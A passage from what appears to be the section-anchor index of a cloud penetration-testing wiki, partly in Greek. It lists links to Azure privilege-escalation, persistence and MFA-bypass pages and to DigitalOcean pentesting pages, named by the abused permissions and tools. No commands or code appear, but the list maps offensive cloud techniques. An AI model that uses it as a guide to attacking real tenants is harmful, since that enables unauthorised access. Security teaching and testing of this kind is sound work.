curity/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsjobswrite-microsoftautomationautomationaccountsrunbooksdraftwrite-microsoftautomationautomationaccountsjobsoutputread-microsoftautomationautomationaccountsrunbookspublishaction-microsoftresourcessubscriptionsresourcegroupsread-microsoftautomationautomationaccountsrunbookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsscheduleswrite-microsoftautomationautomationaccountsjobscheduleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswebhookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsrunbooksdraftwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountssourcecontrolswrite-microsoftautomationautomationaccountssourcecontrolsread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsvariableswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#custom-runtime-environments","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#compromising-state-configuration","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#az---azure-container-registry-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#azure-container-registry","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistcredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestokenswrite-microsoftcontainerregistryregistriesgeneratecredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistbuildsourceuploadurlaction-microsoftcontainerregistryregistriesschedulerunaction-microsoftcontainerregistryregistriesrunslistlogsasurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestaskswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriesimportimageaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#az---azure-container-instances-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#azure-container-instances","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#microsoftcontainerinstancecontainergroupsread-microsoftcontainerinstancecontainergroupscontainersexecaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#az---cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountssqlroledefinitionswrite-microsoftdocumentdbdatabaseaccountssqlroledefinitionsread--microsoftdocumentdbdatabaseaccountssqlroleassignmentswrite-microsoftdocumentdbdatabaseaccountssqlroleassignmentsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#az---entraid-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Ρόλοι","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Ρόλος-Διαχειριστής-Ρόλων-με-Προνομία","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Εφαρμογές","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsmyorganizationcredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#service-principals","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalssynchronizationcredentialsmanage","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsdisable-και-enable","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Ομάδες","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsmembersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsdynamicmembershipruleupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Δυναμικές-Ομάδες-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Χρήστες","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryuserspasswordupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryusersbasicupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Πολιτικές-Προσβασιμότητας-με-Όρους--Παράκαμψη-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Συσκευές","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredusersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicelocalcredentialspasswordread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#bitlockerkeys","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorybitlockerkeyskeyread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#Άλλες-Ενδιαφέρουσες-άδειες-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#az---Πολιτικές-Προσβασιμότητας--Παράκαμψη-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Βασικές-Πληροφορίες","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Αριθμητική","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#bypasses-Πολιτικών-Προσβάσεων","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Πλατφόρμες-Συσκευών---Συνθήκη-Συσκευής","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Τοποθεσίες-Χώρες-Εύρη-ip---Συνθήκη-Συσκευής","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Εφαρμογές-cloud","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Άλλες-παρακάμψεις-az-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Ήχος-κλήσης","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Συμβατές-Συσκευές","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Εργαλεία","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#azureappssweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#roadrecon","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#invoke-mfasweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ropci","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#donkeytoken","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#Αναφορές","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#az---dynamic-groups-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#basic-information","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#example","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#Αναφορές","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#az---functions-app-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#function-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#bucket-readwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostlistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostfunctionkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostmasterkeywrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostsystemkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction-microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitespublishxmlaction-microsoftwebsitesbasicpublishingcredentialspolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionstokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesfunctionspropertiesread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfiglistaction-microsoftwebsitesread-microsoftwebsitesconfiglistaction-microsoftwebsitesconfigread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction-microsoftwebsitesread-microsoftwebsitesoperationresultsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#remote-debugging","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#Αλλαγή-αποθετηρίου-github","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#az---key-vault-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#azure-key-vault","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#microsoftkeyvaultvaultswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#Τροποποίηση-Περιορισμών-Δικτύου","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#az---logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction--microsoftlogicworkflowstriggersrunaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftwebsitesread-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsiteswrite-microsoftwebsitesconfiglistaction--microsoftwebsitesstartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#az---mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread--microsoftdbformysqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbformysqlflexibleserversadministratorswrite--microsoftdbformysqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#az---postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbforpostgresqlflexibleserversadministratorswrite--microsoftdbforpostgresqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#az---queue-storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#queue","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#action-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#Αναφορές","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#az---service-bus-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#service-bus","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#Αποστολή-Μηνυμάτων-Ενέργεια-microsoftservicebusnamespacesauthorizationruleslistkeysaction-Ή-microsoftservicebusnamespacesauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#Λάβετε-Μηνύματα-Ενέργεια-microsoftservicebusnamespacesauthorizationruleslistkeysaction-Ή-microsoftservicebusnamespacesauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationrulesread--microsoftservicebusnamespacesauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#Αναφορές","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#az---static-web-apps-post-exploitation","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#azure-static-web-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitessnippetswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#overwrite-file---overwrite-routes-html-js","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitesresetapikeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitescreateuserinvitationaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#pull-requests","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#az---storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#blobs-specific-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsblobservicescontainersimmutabilitypolicieswrite--microsoftstoragestorageaccountsblobservicescontainersimmutabilitypoliciesdelete","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#file-shares-specific-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicestakeownershipaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesmodifypermissionsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesactassuperuseraction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocaluserswrite-microsoftstoragestorageaccountslocalusersread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocalusersregeneratepasswordaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsrestoreblobrangesaction-microsoftstoragestorageaccountsblobservicescontainersread-microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicessharesrestoreaction--microsoftstoragestorageaccountsread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#Άλλες-ενδιαφέρουσες-άδειες-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#Αναφορές","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#az---sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversread--microsoftsqlserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversfirewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversipv6firewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversadministratorswrite--microsoftsqlserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversazureadonlyauthenticationswrite--microsoftsqlserversazureadonlyauthenticationsread","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#az---virtual-machines--network-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#vms--network","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesextensionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputediskswrite-microsoftnetworknetworkinterfacesjoinaction-microsoftcomputevirtualmachineswrite-microsoftcomputegalleriesapplicationswrite-microsoftcomputegalleriesapplicationsversionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesruncommandaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginasadminaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftresourcesdeploymentswrite-microsoftnetworkvirtualnetworkswrite-microsoftnetworknetworksecuritygroupswrite-microsoftnetworknetworksecuritygroupsjoinaction-microsoftnetworkpublicipaddresseswrite-microsoftnetworkpublicipaddressesjoinaction-microsoftnetworknetworkinterfaceswrite-microsoftcomputevirtualmachineswrite-microsoftnetworkvirtualnetworkssubnetsjoinaction-microsoftnetworknetworkinterfacesjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachineswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#todo-microsoftcomputevirtualmachineswacloginasadminaction","pentesting-cloud/azure-security/az-persistence/index.html#az---persistence","pentesting-cloud/azure-security/az-persistence/index.html#oauth-application","pentesting-cloud/azure-security/az-persistence/index.html#applications-and-service-principals","pentesting-cloud/azure-security/az-persistence/index.html#federation---token-signing-certificate","pentesting-cloud/azure-security/az-persistence/index.html#federation---trusted-domain","pentesting-cloud/azure-security/az-persistence/index.html#Αναφορές","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#az---cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-queue-persistance.html#az---queue-storage-persistence","pentesting-cloud/azure-security/az-persistence/az-queue-persistance.html#queue","pentesting-cloud/azure-security/az-persistence/az-queue-persistance.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-persistence/az-queue-persistance.html#Αναφορές","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#az---vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-vm-applications-vm-extensions--images","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-instances","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#az---storage-persistence","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#storage-privesc","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#Κοινά-κόλπα","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsblobservicescontainersupdate--microsoftstoragestorageaccountsblobservicesdeletepolicywrite","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-device-registration.html#az---device-registration","pentesting-cloud/azure-security/az-device-registration.html#basic-information","pentesting-cloud/azure-security/az-device-registration.html#tpm---trusted-platform-module","pentesting-cloud/azure-security/az-device-registration.html#Καταχώριση-μιας-συσκευής-με-sso-tokens","pentesting-cloud/azure-security/az-device-registration.html#Επικαλύπτοντας-ένα-εισιτήριο-συσκευής","pentesting-cloud/azure-security/az-device-registration.html#Επικαλύψτε-το-κλειδί-whfb","pentesting-cloud/azure-security/az-device-registration.html#Αναφορές","pentesting-cloud/digital-ocean-pentesting/index.html#digital-ocean-pentesting","pentesting-cloud/digital-ocean-pentesting/index.html#basic-information","pentesting-cloud/digital-ocean-pentesting/index.html#basic-enumeration","pentesting-cloud/digital-ocean-pentesting/index.html#ssrf","pentesting-cloud/digital-ocean-pentesting/index.html#projects","pentesting-cloud/digital-ocean-pentesting/index.html#whoami","pentesting-cloud/digital-ocean-pentesting/index.html#Υπηρεσίες-Αρίθμησης","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#do---Βασικές-Πληροφορίες","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Βασικές-Πληροφορίες","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Κύριες-Διαφορές-από-το-aws","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Ιεραρχία","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Χρήστης","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Ομάδα","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Έργο","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Δικαιώματα","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Ομάδα-1","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Ρόλοι","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Πρόσβαση","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Όνομα-χρήστη--κωδικός-πρόσβασης-mfa","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Κλειδιά-api","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Κλειδιά-πρόσβασης-spaces","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#oauth-Εφαρμογή","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#Κλειδιά-ssh","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#token-Αυθεντικοποίησης-Λειτουργιών","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#logs","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#user-logs","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#team-logs","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#references","pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.html#do---Άδειες-για-μια-Δοκιμή-Διείσδυσης","pentesting-cloud/digital-ocean-pentesting/do-services/index.html#do---Υπηρεσίες","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#do---apps","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#Βασικές-Πληροφορίες","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#rce--Κρυπτογραφημένες-μεταβλητές-περιβάλλοντος","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#do---container-registry","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#connection","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#Καταμέτρηση","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#do---databases","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#connections-details","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#Καταμέτρηση","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#do---droplets","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#authentication","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#firewall","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#rce","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#do---functions","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#triggers","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#do---images","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#do---kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#Βασικές-Πληροφορίες","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#digitalocean-kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#Σύνδεση","pe